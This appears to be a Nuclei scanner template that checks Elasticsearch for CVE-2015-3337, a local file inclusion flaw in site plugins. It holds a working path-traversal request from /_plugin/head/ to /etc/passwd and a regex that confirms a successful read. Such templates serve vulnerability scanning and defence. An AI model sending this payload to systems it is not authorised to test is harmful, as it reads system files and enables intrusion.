id: CVE-2015-3337 info: name: Elasticsearch - Local File Inclusion author: pdteam severity: high description: Elasticsearch before 1.4.5 and 1.5.x before 1.5.2 allows remote attackers to read arbitrary files via unspecified vectors when a site plugin is enabled. reference: - https://www.exploit-db.com/exploits/37054/ - http://web.archive.org/web/20210121084446/https://www.securityfocus.com/archive/1/535385 - https://www.elastic.co/community/security - http://www.debian.org/security/2015/dsa-3241 - https://nvd.nist.gov/vuln/detail/CVE-2015-3337 classification: cve-id: CVE-2015-3337 tags: edb,cve,cve2015,elastic,lfi,elasticsearch,plugin requests: - method: GET path: - "{{BaseURL}}/_plugin/head/../../../../../../../../../../../../../../../../etc/passwd" matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" part: body - type: status status: - 200 # Enhanced by mp on 2022/06/08